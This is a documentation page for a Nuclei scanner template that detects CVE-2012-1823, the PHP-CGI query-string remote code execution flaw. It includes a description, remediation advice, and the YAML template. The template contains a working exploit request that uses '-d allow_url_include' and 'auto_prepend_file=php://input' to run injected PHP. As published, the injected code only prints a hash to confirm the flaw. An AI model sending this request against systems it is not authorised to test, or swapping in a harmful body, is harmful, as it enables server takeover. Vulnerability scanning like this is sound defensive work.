Skip to content
Nuclei Templates

PHP CGI v5.3.12/5.4.2 Remote Code Execution

ID: CVE-2012-1823

Severity: high

Author: pikpikcu

Tags: cve,cve2012,kev,vulhub,rce,php

Description

Section titled “Description”

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the ‘d’ case.

YAML Source

Section titled “YAML Source”
id: CVE-2012-1823


info:
  name: PHP CGI v5.3.12/5.4.2 Remote Code Execution
  author: pikpikcu
  severity: high
  description: |
    sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.
  impact: |
    Remote code execution
  remediation: |
    Upgrade to a patched version of PHP or apply the necessary security patches.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823
    - https://nvd.nist.gov/vuln/detail/CVE-2012-1823
    - https://bugs.php.net/bug.php?id=61910
    - http://www.php.net/ChangeLog-5.php#5.4.2
    - http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03360041
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2012-1823
    cwe-id: CWE-20
    epss-score: 0.97363
    epss-percentile: 0.99899
    cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: php
    product: php
    shodan-query: cpe:"cpe:2.3:a:php:php"
  tags: cve,cve2012,kev,vulhub,rce,php
variables:
  string: "CVE-2012-1823"


http:
  - raw:
      - |
        POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        <?php echo md5("{{string}}");?>


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(string)}}'
# digest: 490a0046304402201cb92360b648a9f4f4fd10ea348655c877d640a714bb2277f49b2af83c0095cf0220285b5f8a6cef71248bfaab4597b5b4707363b7ca6b3963d3a7f85a934cde09f2:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2012/CVE-2012-1823.yaml"

View on Github